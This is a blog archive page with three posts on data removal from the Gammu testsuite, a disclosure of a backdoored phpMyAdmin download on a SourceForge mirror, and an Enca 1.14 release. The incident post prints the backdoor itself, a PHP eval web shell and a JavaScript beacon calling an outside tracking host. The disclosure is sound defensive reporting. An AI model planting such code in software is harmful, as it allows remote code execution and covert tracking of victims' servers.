Michal Čihař - Archive for 9/2012

Data, once put on the internet, are quite hard to delete. You can most likely delete (or ask for deleting) them from place where it has been originally distributed, but you can be never sure where else it has appeared.

Recently, I've seen several requests to remove some data from Gammu testsuite. This testsuite was created using public data available in our bug tracker, simply to be able to verify that we won't break stuff which was earlier fixed.

It turns out that some people did make public some very private stuff, which was included in the testsuite in the end. None of the developers had clue about content of these messages, being in language which nobody of us understands (and being too lazy to run them through Google translator to understand them).

Of course we've removed the data on request, but it's probably already copied in dozen other places on the internet...

Yesterday, phpMyAdmin security team has been notified about backdoor being distributed together with phpMyAdmin zip file on one of SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code, there was file called server_sync.php which simply called eval on passed data:

<?php @eval($_POST['c']);?>

In addition to this, javascript code has been included, which could allow attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all looks like simple, but quite effective way to install backdoor, if they would be able to spread this more widely. We've immediately released PMASA-2012-5 to notify our users.

Luckily this was spot quite fast (looking at used domain, the exploit could not be alive before 22th September 2012) and not on much frequent mirror (based on SourceForge official statement about 400 users have downloaded the file with backdoor).

What still remains unclear is whether this was really only targeted on phpMyAdmin, or there were more modified file on this mirror (SourceForge hosts thousands of projects). I've randomly tried few our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do some more systematic analysis, so this question can now be answered only by SourceForge.

Seems I've forgotten to announce Enca 1.13 here, but I won't do the same mistake with 1.14, which has been released today.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs. It's code is currently available at Gitorious.

The full changes for 1.14 release are short:

• Allow standard names for belarusian and slovenian languages, thanks to Branislav Geržo for suggestion.
• Reset strictness when check buffer less than file size, thanks to Sam Liao.
• Fixed typos in man page, thanks to A. Costa.

Still enca is in maintenance mode only and I have no intentions to write new features. However there is no limitation to other contributors :-).

You can download from http://cihar.com/software/enca/.